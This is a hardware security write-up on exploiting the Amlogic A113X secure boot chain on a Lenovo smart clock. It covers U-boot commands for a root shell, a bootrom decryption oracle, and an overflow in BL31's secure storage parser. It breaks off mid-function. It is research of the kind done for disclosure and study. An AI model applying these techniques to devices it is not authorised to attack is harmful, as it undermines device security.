Dumping the Amlogic A113X Bootrom
[+] Introduction
While investigating the Sonos One (2nd generation) smart speaker for a potential entry into the Pwn2Own 2022 Toronto competition, I got slightly (ahem) sidetracked by a small adventure relating to the bootchain of the AMLogic A113 family of chips.
This work was inspired by Frederic B’s work on AMLogic SoCs. Make sure to check out his awesome blog posts.
To quote the marketing blurb from AMLogic themselves:
With the strong computing capability of quad-core 64-bit CPU architecture, A113X can support the mainstream far-field voice recognition solutions without external DSP chip. A113X can support 8-channel PDM and multi-channel I2S. With flexible microphone array and audio input and output interfaces, A113X is a perfect choice for smart speakers and smart home applications.
The Sonos One (gen2) is based around the A113D SoC. Its bootchain is surprisingly well protected. It uses the “secure boot” functionality the SoC offers, meaning all bootloader stages are encrypted and have an RSA signature attached to them. The encryption keys for these bootloaders sit in an eFUSE array that can’t (normally) be read, even by privileged (kernel) code. The U-boot that (nowadays) ships with these devices has been locked down and is protected by a password.
[+] Target board
As mentioned in the previous paragraph, the Sonos One is not a very good board for experimenting with the A113 secure boot chain in general. I looked around for a cheap, locally available alternative and stumbled across the Lenovo Smart Clock Essential. It’s a silly little “smart clock” that (at the time) was available for ~50 EUR locally. After (finally) managing to disassemble the device, I was able to identify some testpoints for the UART.
Luckily, the Lenovo Clock was a bit less aggressively protected than the Sonos One. For one, the U-boot boot process can be interrupted by sending some bytes over the UART, allowing you to break into a U-boot shell. Secondly, the OTP/eFUSE bits on the Lenovo Clock are configured in a way that does not disable the USB boot protocol of the BootROM.
The Lenovo Clock runs a Linux/Android based OS image. After comprehending the U-boot environment variables/scripts a bit I was able to come up with the following basic recipe to boot the thing and drop into a root shell:
```
setenv adb_setting run set_adb_debuggable
run preboot
run bootcmd
```
We’re not really interested in any of the Linux stuff, but this provided a simple way to copy the `/dev/mtd` partitions out to a USB mass storage device (the thing has a USB port) without having to hot-air the NAND flash off the board or dump the flash over serial through some U-boot trickery.
After dumping the flash I learnt that even though the Lenovo U-boot isn’t locked down, they do in fact make use of the AMLogic-provided “secure boot” functionality.
This means all the bootloaders reside encrypted on the flash and their integrity is ensured by verifying an RSA signature.
[+] A113X Recon
Finding a datasheet/reference manual with the gritty details of the A113X was surprisingly hard. Typically these are only supplied to vendors who buy the chips for use in their products. Luckily, with some sleuthing I was able to find a Chinese “document sharing” website where it could be obtained... but first I had to farm some credits by uploading some (unique) documents myself. After uploading a few (publicly available) AMLogic datasheets I was able to get the (non-publicly available) datasheet in return. It happens to have a Xiaomi watermark; thanks, anonymous Xiaomi (affiliated) engineer who decided to violate his NDA!
[+] ARM Trusted Firmware TL;DR
Before we move on, let’s have a quick look at a dumbed-down overview of the boot path of a platform that follows the Arm Trusted Firmware reference implementation (from here on abbreviated as ATF), like the AMLogic A113X does. We’ll ignore things like the SCP (System Control Processor) for now (although it would make an interesting subject for a follow-up post) and focus on what runs on the Application Processor.
As we can see from my poorly drawn diagram, upon reset of the system, execution starts in `BL1`, the BootROM. The BootROM will chainload `BL2`, which in turn will load the various `BL3x` stages. `BL31` is the Secure Monitor code running in the highest privilege level, known as `EL3`. `BL32` is the Secure-EL1 payload; on the target we’re exploring there is no `BL32` payload.
The first piece of “untrusted” code that lives outside of the secure world is `BL33`. Typically this is where you will find a bootloader such as U-boot, which in turn will chainload something like Linux.
Our goal for today is to compromise the `EL3` secure monitor by running code from the untrusted (“normal world”) context!
[+] AMLogic USB recovery mode
From various online sources and by reading Frederic’s work I learnt a bit about the general boot flow of AMLogic SoCs. The USB Recovery Mode is especially interesting, as it can be interfaced with from any USB host. There are some open source efforts at documenting and implementing this USB Recovery Mode protocol, and otherwise there are some closed source utilities provided by AMLogic themselves.
The BootROM will check two “boot strap” pins (POC1, POC2) to determine in which order it will probe the various methods of booting the system. The following flowchart illustrates this:
The goal of all of the various boot methods is to load the next stage bootloader into memory and start running it. The next stage bootloader is called `BL2`. When secure boot is enforced (as on the Lenovo and Sonos target boards we have), the BootROM will only let us load correctly encrypted and signed `BL2` binaries. Of course, we lack both the encryption keys and the private signing keys.
By studying pyamlboot and the official aml-flash-tool binaries I was able to learn a bit about the USB protocol that is used for talking to the USB recovery code.
The USB recovery protocol uses regular USB control transfers and supports a handful of commands. The command opcode is put in the `bRequest` field of the control transfer packet(s), and things like addresses/offsets are typically sliced into two 16-bit halves and stuffed into the `wValue` and `wIndex` fields. If those are foreign/alien words to you and you want to learn more about the nitty gritty details of the cursed technology that is known as USB... I kindly refer you to USB in a nutshell.
Since we don’t have access to the BootROM code, we cannot study the actual implementation. Instead, we’ll rely on publicly available tools/code and some good old blackbox testing.
PyAMLBoot gives us the following table of available commands:
```python
REQ_WRITE_MEM   = 0x01
REQ_READ_MEM    = 0x02
REQ_FILL_MEM    = 0x03
REQ_MODIFY_MEM  = 0x04
REQ_RUN_IN_ADDR = 0x05
REQ_WRITE_AUX   = 0x06
REQ_READ_AUX    = 0x07
```
The `*_MEM` operations allow for reading/writing into (restricted ranges of) SRAM. The `REQ_RUN_IN_ADDR` operation starts decryption and verification of the BL2 image at a specified address; if verification succeeds it will jump to the BL2 entrypoint. `REQ_READ_AUX` and `REQ_WRITE_AUX` can be used to peek/poke (restricted ranges of) memory-mapped IO.
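To make the request encoding concrete, here is a minimal sketch that packs one of these commands into a standard 8-byte USB SETUP packet (`bmRequestType`, `bRequest`, `wValue`, `wIndex`, `wLength`, little-endian). The opcodes come from the table above; the helper names are hypothetical, and putting the upper address half in `wValue` and the lower half in `wIndex`, as well as using the generic vendor request types `0x40`/`0xC0`, are assumptions rather than something verified against the BootROM.

```python
import struct

# Opcodes from the pyamlboot command table
REQ_WRITE_MEM = 0x01
REQ_READ_MEM = 0x02

# Generic bmRequestType values for vendor requests (assumption: the BootROM uses these)
VENDOR_OUT = 0x40  # host -> device
VENDOR_IN = 0xC0   # device -> host


def split_addr(addr):
    """Slice a 32-bit address into (high, low) 16-bit halves."""
    return (addr >> 16) & 0xFFFF, addr & 0xFFFF


def setup_packet(opcode, addr, length, device_to_host):
    """Pack bmRequestType, bRequest, wValue, wIndex, wLength into 8 bytes.

    Assumption: the high address half goes into wValue, the low half into wIndex.
    """
    w_value, w_index = split_addr(addr)
    bm_request_type = VENDOR_IN if device_to_host else VENDOR_OUT
    return struct.pack("<BBHHH", bm_request_type, opcode, w_value, w_index, length)


if __name__ == "__main__":
    pkt = setup_packet(REQ_READ_MEM, 0x12345678, 64, device_to_host=True)
    print(pkt.hex())
```

With pyusb the same five fields would be passed to `dev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_or_wLength)`, which builds this SETUP packet for you.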
[+] Secure Boot Decryption Oracle
When loading a BL2 image over USB, you load the BL2 image data to SRAM in chunks of 64 bytes using the `REQ_WRITE_MEM` command. After sending the final chunk you send a `REQ_RUN_IN_ADDR` command with the SRAM base address of the BL2 image you just loaded to kick off decryption + validation + execution.
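The upload sequence can be sketched as plain data: a list of 64-byte `REQ_WRITE_MEM` commands followed by a single `REQ_RUN_IN_ADDR`. The function `plan_bl2_upload` and the base address are hypothetical, and the sketch models `REQ_RUN_IN_ADDR` as carrying only the address (empty payload); how a real tool encodes that final request is not covered here.

```python
CHUNK_SIZE = 64
REQ_WRITE_MEM = 0x01
REQ_RUN_IN_ADDR = 0x05


def plan_bl2_upload(image, base):
    """Return the ordered (opcode, address, payload) commands for a BL2 upload.

    The image is written in 64-byte chunks, then REQ_RUN_IN_ADDR is issued with
    the SRAM base address to trigger decryption + validation + execution.
    """
    cmds = []
    for off in range(0, len(image), CHUNK_SIZE):
        cmds.append((REQ_WRITE_MEM, base + off, image[off:off + CHUNK_SIZE]))
    cmds.append((REQ_RUN_IN_ADDR, base, b""))  # assumption: address only, no payload
    return cmds
```

Keeping the plan separate from the USB transport makes it easy to replay the same sequence, which is handy for the blackbox experiments described next.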
During some blackbox fiddling with this procedure I quickly noticed a funny oversight in the behavior of `REQ_RUN_IN_ADDR`. The decryption of the data placed in SRAM happens in-place, and when the signature verification fails it does not bother to clear out the decrypted contents in SRAM. After a failed `REQ_RUN_IN_ADDR` command we are still able to follow up with additional commands, and thus we can use the `REQ_READ_MEM` command to read back the decrypted contents! Essentially, this gives us a decryption oracle for BL2 images and any other data that is encrypted with the same algorithm/key.
Some more blackbox poking at this interface revealed that the encryption uses a block cipher with a 16-byte block size, and that it exhibits the properties of a block cipher used in CBC mode.
Using this little trick, I corrupted some trailing bytes of a known-valid BL2 image I got from my NAND dump (which resides at the very start of mtd0) to make signature verification fail, and was able to dump the decrypted BL2 code/data for further static analysis.
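A couple of small helpers make this kind of oracle poking easier to reason about. Under CBC, flipping one bit in ciphertext block i garbles plaintext block i and flips the same bit in block i+1, leaving every other block intact; corrupting only the final block therefore spoils the signature check while the rest of the image still decrypts cleanly. The helper names are hypothetical, and the actual oracle round trip (upload, failed `REQ_RUN_IN_ADDR`, `REQ_READ_MEM`) is deliberately left out.

```python
BLOCK = 16


def differing_blocks(a, b, block=BLOCK):
    """Indices of the block-sized chunks in which a and b differ."""
    assert len(a) == len(b)
    return [i // block for i in range(0, len(a), block)
            if a[i:i + block] != b[i:i + block]]


def flip_bit(data, byte_index, bit=0):
    """Return a copy of data with a single bit flipped."""
    out = bytearray(data)
    out[byte_index] ^= 1 << bit
    return bytes(out)


def corrupt_tail(image, n=BLOCK):
    """Invert the last n bytes so signature verification fails."""
    out = bytearray(image)
    for i in range(len(out) - n, len(out)):
        out[i] ^= 0xFF
    return bytes(out)
```

Against a live oracle, CBC behaviour would show up as `differing_blocks(oracle(ct), oracle(flip_bit(ct, 16 * i)))` returning `[i, i + 1]` for any block i except the last.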
[+] Reversing BL2
`BL2` is responsible for loading `BL31` and `BL33`. `BL31` runs in the highest privilege context in the secure world, known as `EL3`. `BL33` runs in the normal world and typically consists of a bootloader like U-boot, which in turn will chainload something like Linux.
If we look at the UART log output from `BL2` we can see:
```
Load FIP HDR from NAND, src: 0x0000c000, des: 0x01700000, size: 0x00004000, part: 0
Load BL3x from NAND, src: 0x00010000, des: 0x01704000, size: 0x000b0e00, part: 0
NOTICE: BL31: v1.3(release):d3a620ec3
NOTICE: BL31: Built : 10:32:40, Jan 20 2021
NOTICE: BL31: AXG secure boot!
NOTICE: BL31: BL33 decompress pass
```
The ‘FIP HDR’ is a table containing offsets/sizes for the various `BL3x` blobs. Each entry in this table has size `0x28`, with a maximum of 32 entries. The layout of an entry is:
```c
uint8_t  uuid[0x10];
uint64_t offset;
uint64_t size;
uint64_t flags;
```
Using the same decryption oracle we used to decrypt `BL2`, we can also decrypt the FIP table + all `BL3x` data. Next, we can parse the FIP and extract the individual chunks using a simple script:
```python
#!/usr/bin/env python3
import binascii
import os
import struct
import sys

FIP_ENTRY_COUNT_MAX = 32
FIP_ENTRY_SIZE = 0x28

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: %s <input.bin> <outputdir>" % sys.argv[0])
        sys.exit(1)

    input_filename, output_dir = sys.argv[1:]
    os.makedirs(output_dir, exist_ok=True)

    # skip the first 0x10 bytes of the input; the FIP header follows
    with open(input_filename, "rb") as fh:
        d = fh.read()[0x10:]

    # FIP header: 32-bit name, 32-bit serial number, 64-bit flags
    fip_hdr = struct.unpack("<LLQ", d[0:0x10])
    assert fip_hdr[0] == 0xaa640001
    assert fip_hdr[1] == 0x12345678

    for i in range(FIP_ENTRY_COUNT_MAX):
        entry_offs = 0x10 + (i * FIP_ENTRY_SIZE)
        entry = d[entry_offs:entry_offs + FIP_ENTRY_SIZE]
        uuid = entry[0:0x10]
        if uuid == b"\x00" * 16:
            break  # an all-zero UUID terminates the table
        offs, size, flags = struct.unpack("<QQQ", entry[0x10:])
        uuid_str = binascii.hexlify(uuid).decode()
        print("entry #%02d: %s - offs: %08x, size: %08x, flags: %x" % (
            i, uuid_str, offs, size, flags
        ))
        if size == 0:
            continue
        output_filename = os.path.join(output_dir, "%02d_%08x_%s" % (i, offs, uuid_str))
        with open(output_filename, "wb") as fh:
            fh.write(d[offs:offs + size])
```
```
$ python3 fip.py mtd1.out fip_out
#00: 9766fd3d89bee849ae5d78a140608213 - offs: 00004000, size: 0000d800
#01: 47d4086d4cfe98469b952950cbbd5a00 - offs: 00011800, size: 00031600
#02: 05d0e18953dc13478d2b500a4b7a3e38 - offs: 00042e00, size: 00000000
#03: d6d0eea7fcead54b97829934f234b6e4 - offs: 00042e00, size: 00072000
#04: f41d1486cb95e6118488842b2b01ca38 - offs: 00000188, size: 00000468
#05: 4856ccc2cc85e611a5363c970e97a0ee - offs: 000005f0, size: 00000468
```
Examining the extracted chunks we observe that:
UUID 9766fd3d89bee849ae5d78a140608213 = BL30
UUID 47d4086d4cfe98469b952950cbbd5a00 = BL31
UUID 05d0e18953dc13478d2b500a4b7a3e38 = empty (unused BL32 slot)
UUID d6d0eea7fcead54b97829934f234b6e4 = BL33
UUID f41d1486cb95e6118488842b2b01ca38 = metadata
UUID 4856ccc2cc85e611a5363c970e97a0ee = metadata
Great! We now have the plaintext blobs for `BL31` (the EL3 secure monitor) and `BL33` (U-boot)!
[+] Reversing BL31
Our goal is to dump the BootROM and eFUSE/OTP data, so we’ll need to find a way to get code running in the context of the EL3 secure monitor (`BL31`). I started by studying the open source ATF reference implementation.
The documentation on ‘Arm SiP Services’ mentions:
SiP services are non-standard, platform-specific services offered by the silicon implementer or platform provider. They are accessed via SMC (“SMC calls”) instruction executed from Exception Levels below EL3.
This sounds like a great spot to start hunting for bugs. It involves vendor-specific code that deviates from the open source reference implementation, and it can be reached from the “normal world” by invoking `SMC` (Secure Monitor Call) instructions.
By reading the ATF code we learn that SMC calls are divided up into “services”, of which SiP is one. These services are registered from a table of `rt_svc_desc` entries. These service descriptors contain (amongst other things) a name for the service and two function pointers: one for initialization (`init`) and another one for handling the actual secure monitor calls (`handle`). The SiP service is conveniently called `sip_svc`, so by following some references to this string constant I was quickly able to find the SiP SMC routine dispatcher.
I expected to maybe identify a handful of vendor-specific SMC functions, but to my surprise there were 115 of them in total. The `handle` function contains a big switch case for the various vendor-specific SMC IDs and dispatches their functionality by looking up a function pointer in a big table that I call `platform_ops`. The `platform_ops` pointer is initialized by the SiP service `init` function and resides in the `.data` section of the EL3 code.
115 routines (not to mention all the subroutines they call into) is quite a bit of tedious reversing work. Luckily, a lot of it is boilerplate, such as routines that simply return a pointer to where the shared memory buffers reside. Quite a few entries in the `platform_ops` table were also NULL pointers, making the SiP SMC dispatcher bail if you tried to invoke any of these. After culling through it a bit we’re left with routines pertaining to (surprise) cryptographic operations, limited access to OTP/eFUSE data, and a whole cluster of routines related to some “secure storage” facility.
[+] Secure Storage
The “secure storage” functionality provides a way to keep key/value pairs encrypted with an AES key that is never visible to the normal world.
Linux (or any other OS running in the normal world) can query the secure storage, and read/write items to/from this storage using these vendor-specific SMC calls.
Reversing the storage related routines reveals the following core functions that can be invoked through the SMC interface:
- SMC `0x82000069` - `SIP_CMD_STORAGE_PARSE`: parses an (encrypted) secure storage blob; it must be invoked before you can actually read or write items from the storage.
- SMC `0x82000061` - `SIP_CMD_STORAGE_READ`: reads an item from the secure storage. The name of the item is included in the request body.
- SMC `0x82000062` - `SIP_CMD_STORAGE_WRITE`: writes/updates an item in the secure storage.
- SMC `0x82000068` - `SIP_CMD_STORAGE_REMOVE`: removes an item from the secure storage.
- SMC `0x82000067` - `SIP_CMD_STORAGE_LIST`: gets a list of all items (names) in the secure storage.
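The SMC IDs above follow the Arm SMC Calling Convention: bit 31 marks a fast call, bit 30 selects SMC64 over SMC32, bits 29:24 hold the Owning Entity Number (OEN, where 2 means SiP Service Calls) and bits 15:0 hold the function number. The small decoder below (a hypothetical helper, not code from BL31) shows that all storage calls are fast SMC32 calls routed to the SiP service, which is why they end up in the `sip_svc` dispatcher.

```python
OEN_NAMES = {0: "Arm Architecture", 1: "CPU Service", 2: "SiP Service",
             3: "OEM Service", 4: "Standard Secure Service"}

STORAGE_SMCS = {
    0x82000069: "SIP_CMD_STORAGE_PARSE",
    0x82000061: "SIP_CMD_STORAGE_READ",
    0x82000062: "SIP_CMD_STORAGE_WRITE",
    0x82000068: "SIP_CMD_STORAGE_REMOVE",
    0x82000067: "SIP_CMD_STORAGE_LIST",
}


def decode_smc_id(fid):
    """Split an SMC function ID into its SMC Calling Convention fields."""
    return {
        "fast_call": bool((fid >> 31) & 1),
        "smc64": bool((fid >> 30) & 1),
        "oen": (fid >> 24) & 0x3F,
        "function": fid & 0xFFFF,
    }


if __name__ == "__main__":
    for fid, name in STORAGE_SMCS.items():
        f = decode_smc_id(fid)
        print("%-24s 0x%08x: %s, %s, function 0x%02x" % (
            name, fid, OEN_NAMES.get(f["oen"], "other"),
            "SMC64" if f["smc64"] else "SMC32", f["function"]))
```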
To start using this secure storage we invoke `SIP_CMD_STORAGE_PARSE`, which accepts a single argument that contains the size of the encrypted storage blob. The actual encrypted storage blob to be parsed is written to a shared memory buffer residing in DRAM. The address of this shared buffer is fixed and can be retrieved using SMC `0x82000025`; this address is `0x5080000`.
The maximum size accepted by the `SIP_CMD_STORAGE_PARSE` handler is `0x40000` bytes.
The storage starts with a plaintext header of size `0x200` that looks like this:
```c
struct {
    uint8_t  magic[0x10];
    uint32_t key_version;
    uint32_t seed_mode;
    uint8_t  body_hash[0x20];
    uint8_t  padding[];
};
```
Following the header we will find the encrypted body containing the storage items.
If the `key_version` field contains a value greater than `0`, the parser will compute a SHA256 digest over the encrypted body and compare it to the value in `body_hash`. If it doesn’t match, it will bail from the remainder of the parsing logic.
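A minimal sketch of building this plaintext header in front of an already-encrypted body, assuming little-endian fields and zero padding up to `0x200` bytes. The helper names are hypothetical, `seed_mode=2` is just an illustrative default, and the size check assumes the `0x40000` limit applies to the whole blob.

```python
import hashlib
import struct

HEADER_SIZE = 0x200
MAX_STORAGE_SIZE = 0x40000


def build_header(encrypted_body, key_version=1, seed_mode=2):
    """Build the 0x200-byte plaintext secure storage header.

    body_hash is the SHA256 over the *encrypted* body; the parser only
    checks it when key_version > 0.
    """
    body_hash = hashlib.sha256(encrypted_body).digest()
    hdr = struct.pack("<16sII32s", b"AMLSECURITY", key_version, seed_mode, body_hash)
    return hdr.ljust(HEADER_SIZE, b"\x00")


def build_blob(encrypted_body, **kwargs):
    """Header + body, as written to the shared buffer before SIP_CMD_STORAGE_PARSE."""
    blob = build_header(encrypted_body, **kwargs) + encrypted_body
    assert len(blob) <= MAX_STORAGE_SIZE, "larger than the parser accepts"
    return blob
```

The `16s` format zero-pads `AMLSECURITY`, so the `strcmp` against the magic sees a properly terminated string.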
Next, the parsing routine will initially only decrypt the first `0x200` bytes of the encrypted body using AES-256 in CBC mode. We will call this first `0x200`-sized block the `param` block. Depending on the value of `seed_mode` it will construct the AES key and IV in the following way:

- `seed_mode` = 1: error, invalid.
- `seed_mode` = 2: AES key = a hardcoded value from the `.data` section of the EL3 code; AES IV = all zeroes.
- `seed_mode` = anything else: AES key = 12-byte `CPUID` from the eFUSE/OTP concatenated with a fixed 20-byte value from the `.data` section; AES IV = 12-byte `CPUID` from the eFUSE/OTP concatenated with a fixed 4-byte value from the `.data` section.
This is great: even without any knowledge of the `CPUID` value (though it’s easy to recover/grab), we can now encrypt our own arbitrarily constructed “secure storage” blobs and feed them to the parser!
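The key/IV selection can be mirrored in a few lines. In this sketch `data_key`, `key_suffix` and `iv_suffix` are placeholders for the constants in BL31’s `.data` section (their values are not reproduced here), and the 32-byte length of the hardcoded key is assumed from the use of AES-256.

```python
def derive_key_iv(seed_mode, cpuid, data_key, key_suffix, iv_suffix):
    """Mirror the param block AES-256-CBC key/IV selection.

    data_key, key_suffix and iv_suffix stand in for BL31 .data constants.
    """
    if seed_mode == 1:
        raise ValueError("seed_mode 1 is rejected by the parser")
    if seed_mode == 2:
        assert len(data_key) == 32  # assumption: full AES-256 key stored in .data
        return data_key, bytes(16)  # IV is all zeroes
    assert len(cpuid) == 12 and len(key_suffix) == 20 and len(iv_suffix) == 4
    return cpuid + key_suffix, cpuid + iv_suffix  # 32-byte key, 16-byte IV
```

The resulting pair can be handed to any AES-256-CBC implementation (for example the third-party `cryptography` package) to encrypt a crafted `param` block and body.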
The `param` block contains a list of (nested) TLV (Type-Length-Value) entries which are used to describe some properties of the remaining body data. Every TLV entry is structured as a 32-bit `type`, followed by a 32-bit `size`, followed by `size` bytes of data.
The outer TLV is one of type 0x1 `TYPE_PARAM_HEADER`; its body is a single TLV with type 0x2 `TYPE_ENCRYPTED_SIZE` specifying the size of the rest of the body.
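Encoding a TLV and a minimal `param` block is straightforward. This sketch assumes little-endian fields (as is usual on AArch64) and zero padding up to `0x200` bytes; `tlv` and `build_param_block` are hypothetical helpers, and the result still has to be encrypted before it goes into a storage blob.

```python
import struct

TYPE_PARAM_HEADER = 0x1
TYPE_ENCRYPTED_SIZE = 0x2
PARAM_BLOCK_SIZE = 0x200


def tlv(tlv_type, value):
    """Encode one TLV: 32-bit type, 32-bit size, then size bytes of data."""
    return struct.pack("<II", tlv_type, len(value)) + value


def build_param_block(encrypted_size):
    """Outer TYPE_PARAM_HEADER wrapping one TYPE_ENCRYPTED_SIZE TLV, padded to 0x200."""
    inner = tlv(TYPE_ENCRYPTED_SIZE, struct.pack("<I", encrypted_size))
    return tlv(TYPE_PARAM_HEADER, inner).ljust(PARAM_BLOCK_SIZE, b"\x00")
```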
Following the `param` block we have the actual key entries, which are also encoded as a list of nested TLVs.
A key entry always starts with a TLV of type `TYPE_KEY_DEFINITION` (0x3). The body of this TLV contains multiple TLVs describing the properties of this key entry. Possible type values inside a `KEY_DEFINITION` are:
Type | Name | Description |
---|---|---|
0x4 | NAME_SIZE | the length of the name |
0x5 | NAME_DATA | the actual name |
0x6 | VALUE_SIZE | the length of the value |
0x7 | VALUE_DATA | the actual value |
0x8 | KEY_TYPE | a 32-bit value indicating the “type” of value |
0x9 | BUFFER_STATUS | a 32-bit value indicating whether the value is “dirty” |
0xa | HASH_DATA | a 0x20-byte SHA256 digest over the value data |
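Building on the same TLV encoding, a single well-formed key definition could look like the sketch below. The order of the inner TLVs and the 32-bit width of `NAME_SIZE`/`VALUE_SIZE` are assumptions; `key_definition` is a hypothetical helper. Because `HASH_DATA` matches the value, the parser counts such an entry in `g_keys_count`.

```python
import hashlib
import struct

TYPE_KEY_DEFINITION = 0x3
NAME_SIZE, NAME_DATA, VALUE_SIZE, VALUE_DATA = 0x4, 0x5, 0x6, 0x7
KEY_TYPE, BUFFER_STATUS, HASH_DATA = 0x8, 0x9, 0xA


def tlv(tlv_type, value):
    return struct.pack("<II", tlv_type, len(value)) + value


def u32(v):
    return struct.pack("<I", v)


def key_definition(name, value, key_type=0, buffer_status=0):
    """One KEY_DEFINITION TLV whose HASH_DATA matches the value."""
    body = b"".join([
        tlv(NAME_SIZE, u32(len(name))),
        tlv(NAME_DATA, name),
        tlv(VALUE_SIZE, u32(len(value))),
        tlv(VALUE_DATA, value),
        tlv(KEY_TYPE, u32(key_type)),
        tlv(BUFFER_STATUS, u32(buffer_status)),
        tlv(HASH_DATA, hashlib.sha256(value).digest()),
    ])
    return tlv(TYPE_KEY_DEFINITION, body)
```

Concatenating more than 64 of these into the storage body is all it takes to push `g_keys_count` past the capacity of the `g_keys` array, as shown in the next section.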
The `KEY_DEFINITION` entries that are correctly formed get stored internally in an array of `key_entry` structs that resides in the EL3 `.bss`, with a maximum of 64 entries.
The structure of a `key_entry` looks like this:
```c
// sizeof(key_entry) == 0x90
struct key_entry {
    uint8_t  name[80];       // 0x00
    uint32_t name_len;       // 0x50
    uint32_t buffer_status;  // 0x54
    uint32_t key_type;       // 0x58
    uint32_t value_size;     // 0x5c
    uint8_t *value_ptr;      // 0x60
    uint8_t  hash[0x20];     // 0x68
    uint32_t key_in_use;     // 0x88
    uint32_t unknown;        // 0x8c
};
```
The `key_in_use` value specifies whether a key entry is valid or not, and gets set after comparing the SHA256 digest of the value against the `hash`.
[+] Pwning BL31
The loop in the parser code for filling this array of `key_entry` values looks roughly like this:
```c
uint32_t key_entry_size_out;
g_keys_count = 0;
while (encrypted_size) {
    key_out = &g_keys[g_keys_count];  // no check against the 64-entry capacity
    if (parse_key(keyheap_ptr, key_out, &key_entry_size_out)) {
        goto ERROR_BAIL;
    }
    sha256(key_out->value_ptr, key_out->value_size, value_hash);
    key_hash = key_out->hash;
    if (!memcmp(key_hash, value_hash, 32)) {
        key_out->key_in_use = 1;
        ++g_keys_count;
    } else {
        key_out->key_in_use = 1;
    }
    keyheap_ptr = keyheap_ptr + key_entry_size_out;
    encrypted_size -= key_entry_size_out;
}
```
One obvious issue that immediately stands out is that no upper limit on `g_keys_count` is enforced, leading to an overflow of `g_keys`, the array of `key_entry` structs. Looks like a promising bug!
Initially I tried to get code execution by using this overflow to overwrite the pointer to `platform_ops` at the end of `.data`. But doing this required roughly 3740 `key_entry` objects, destroying a lot of pointers/data along the way with uncontrolled data due to the unfortunate alignment of certain `key_entry` struct members.
I studied the memory layout a bit more carefully:
```
0000: uint32_t  g_keys_count;
0004: key_entry g_keys[64];
2404: uint64_t  g_key_version;
240c: uint8_t   param_sector_decrypted[0x200];
```
There was a scratch buffer for the decrypted `param` block neighboring the keys array. So if we add more than 64 entries to the storage blob being parsed, we can overwrite this scratch buffer... which is not actually used anymore at that point. So how is this useful? The `key_entry` objects the parser writes there will be sane enough that this doesn’t really gain us anything.
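The overlap follows directly from the layout listing above (offsets relative to `g_keys_count`). This small calculation, with hypothetical helper names, shows that index 63 is the last slot inside `g_keys`, index 64 straddles `g_key_version` and the scratch buffer, and index 65 lands entirely inside `param_sector_decrypted` at offset `0x88`.

```python
KEY_ENTRY_SIZE = 0x90
G_KEYS = 0x4               # offsets relative to g_keys_count
G_KEY_VERSION = 0x2404
PARAM_SECTOR = 0x240C
PARAM_SECTOR_SIZE = 0x200


def key_offset(index):
    """Offset of g_keys[index], even past the 64-entry capacity."""
    return G_KEYS + index * KEY_ENTRY_SIZE


def overlap(index):
    """Describe what the key_entry at a given index lands on."""
    start = key_offset(index)
    end = start + KEY_ENTRY_SIZE
    if end <= G_KEY_VERSION:
        return "inside g_keys"
    if start >= PARAM_SECTOR and end <= PARAM_SECTOR + PARAM_SECTOR_SIZE:
        return "fully inside param_sector_decrypted at +0x%x" % (start - PARAM_SECTOR)
    return "straddles 0x%x-0x%x" % (start, end)


if __name__ == "__main__":
    for i in (63, 64, 65, 66, 67):
        print(i, hex(key_offset(i)), overlap(i))
```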
If we look at the implementation of `SIP_CMD_STORAGE_READ` and `SIP_CMD_STORAGE_WRITE`, we notice they both look up the corresponding `key_entry` by a given name. The function that does this looks like this:
```c
int key_find_by_name(void *key_name, unsigned int match_len)
{
    int key_index;
    key_entry *current_key;

    key_index = 0;
    while (1) {
        if (key_index > g_keys_count) {
            return 0xFFFFFFFFLL;
        }
        current_key = &g_keys[key_index];
        if ( (current_key->key_in_use & 1) != 0
            && current_key->name_len == match_len
            && !(unsigned int)memcmp(&g_keys[key_index], key_name, match_len)) {
            break;
        }
        ++key_index;
    }
    return key_index;
}
```
This routine has a tiny but interesting quirk: rather than assuming the maximum index into `g_keys` is `min(g_keys_count, 64)`, it assumes `g_keys_count` is always within the bounds of the maximum capacity of `g_keys`.
Let’s study (a majorly trimmed-down version of) the parsing function a bit more:
```c
int parse_storage() {
    g_seed_mode = -1;
    g_key_version = -1;
    param_block_t param_parsed;

    if (strcmp(header.magic, "AMLSECURITY")) {
        goto ERROR_BAIL;
    }

    g_seed_mode = header.seed_mode;
    g_key_version = header.key_version;

    decrypt(param_sector_encrypted, param_sector_decrypted, 0x200);

    // parse_param_sector() returns 0 on success, 0xFFFFFFFF on failure
    if (parse_param_sector(param_sector_decrypted, &param_parsed) != 0) {
        // failure path: only the first 64 entries are wiped,
        // g_keys_count is left untouched
        reset_key_heap();
        memset(g_keys, 0, sizeof(key_entry) * 64);
        return 0;
    }

    g_keys_count = 0;
    decrypt(storage_body_enc, storage_body_dec, storage_body_size);
    while (encrypted_size) {
        // .. key parsing logic
    }
}
```
If we invoke `SIP_CMD_STORAGE_PARSE` a second time we can control what ends up in the `param_sector_decrypted` scratch buffer. Effectively this lets us forge arbitrary `key_entry` objects. The problem is... invoking `SIP_CMD_STORAGE_PARSE` a second time will reset `g_keys_count` to 0... unless we make `parse_param_sector` fail! Then all it will do is wipe `g_keys` (but only up to its original maximum capacity of 64 entries) and leave `g_keys_count` alone. This means that keys with indices of 64 and higher will overlap with the `param_sector_decrypted` buffer.
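A toy Python model (not BL31 code) of the state after the two parses helps to see why the lookup reaches the forged entry. `KeyEntry` and the list standing in for memory are simplifications of the raw `0x90`-byte structs; the lookup keeps the original `>` bound check.

```python
from dataclasses import dataclass

MAX_KEYS = 64


@dataclass
class KeyEntry:
    name: bytes = b""
    key_in_use: int = 0


def key_find_by_name(g_keys, g_keys_count, name):
    """Model of the BL31 lookup: bounded by g_keys_count, not by MAX_KEYS."""
    key_index = 0
    while True:
        if key_index > g_keys_count:
            return -1
        k = g_keys[key_index]
        if k.key_in_use & 1 and len(k.name) == len(name) and k.name == name:
            return key_index
        key_index += 1


if __name__ == "__main__":
    # list slots >= 64 alias whatever follows g_keys in memory
    memory = [KeyEntry(b"k%02d" % i, 1) for i in range(72)]
    g_keys_count = 70                    # first parse: more than 64 valid keys
    for i in range(MAX_KEYS):            # second parse fails: only 64 slots wiped
        memory[i] = KeyEntry()
    memory[65] = KeyEntry(b"XXXX", 1)    # forged through param_sector_decrypted
    print(key_find_by_name(memory, g_keys_count, b"XXXX"))
```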
Let’s examine the logic of `parse_param_sector`:
```c
typedef struct {
    uint32_t type;
    uint32_t size;
} tlv_t;

typedef struct {
    uint32_t encrypted_size;
    uint32_t type_11_val;
} param_block_t;

int parse_param_sector(uint8_t *param_sector_buf, param_block_t *out) {
    int result;
    int remaining;
    tlv_t *tlv_root = (tlv_t*)param_sector_buf;
